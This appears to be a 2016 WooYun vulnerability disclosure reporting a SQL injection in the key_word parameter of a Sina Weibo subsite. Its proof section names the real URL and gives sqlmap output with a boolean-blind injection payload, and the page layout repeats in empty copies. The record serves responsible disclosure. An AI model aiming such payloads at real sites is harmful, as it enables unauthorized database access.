新浪微博某分站存在SQL注入 | wooyun-2016-0170776| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170776

漏洞标题：新浪微博某分站存在SQL注入

漏洞作者： Jannock

提交时间：2016-01-18 11:37

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-18：细节已通知厂商并且等待厂商处理中
2016-01-18：厂商已经确认，细节仅向厂商公开
2016-01-28：细节向核心白帽子及相关领域专家公开
2016-02-07：细节向普通白帽子公开
2016-02-17：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

新浪微博某分站存在SQL注入

详细说明：

网址：
http://xueyuan.weibo.com/course/index?categoryid=&orderby_fild=3&orderby_operate=desc&key_word=&current_type=0
参数：key_word

漏洞证明：

GET parameter 'key_word' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 9 HTTP(s) reque
sts:
---
Place: GET
Parameter: key_word
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoryid=&orderby_fild=3&orderby_operate=desc&key_word=%'and(1=1
AND 2283=2283)and'%'='&current_type=0
---
[10:25:40] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[10:25:40] [INFO] testing MySQL
[10:25:44] [INFO] confirming MySQL
[10:25:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

修复方案：

过滤

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2016-01-18 13:22

厂商回复：

感谢支持，此站为合作方站点，我们将转告要求其修复

漏洞评价：

评价

2016-01-18 11:40 | JutaZ ( 实习白帽子 | Rank:59 漏洞数:11 | 很菜)

前排
2016-01-18 11:44 | Mayter ( 普通白帽子 | Rank:153 漏洞数:39 | 笼鸡有食汤锅近，野鹤无粮天地宽.)

沙发
2016-01-18 11:49 | 从容 ( 普通白帽子 | Rank:252 漏洞数:80 | Enjoy Hacking Just Because It's Fun | ...)

椅子
2016-01-18 11:51 | 90Snake ( 普通白帽子 | Rank:148 漏洞数:49 | 人如果没有梦想，跟咸鱼有什么分别)

一哥也不淡定了
2016-01-18 12:31 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

吃饭看乌云.
2016-01-18 12:40 | 404notfound ( 普通白帽子 | Rank:259 漏洞数:71 | 考研中，有事请留言)

@90Snake 原谅我书读的少，为毛是一哥，还有二哥（疑问）
2016-01-18 13:08 | webshell ( 实习白帽子 | Rank:62 漏洞数:19 | hello word.)

前排占位。。。。。
2016-01-18 13:14 | 90Snake ( 普通白帽子 | Rank:148 漏洞数:49 | 人如果没有梦想，跟咸鱼有什么分别)

@404notfound 好像是之前的排名一哥是乌云排名第一二哥是乌云排名第二所以就叫这个名了，之后就一直延续下来。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170776

漏洞标题：新浪微博某分站存在SQL注入

相关厂商：新浪微博

漏洞作者： Jannock

提交时间：2016-01-18 11:37

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170776

漏洞标题：新浪微博某分站存在SQL注入

相关厂商：新浪微博

漏洞作者： Jannock

提交时间：2016-01-18 11:37

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170776"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：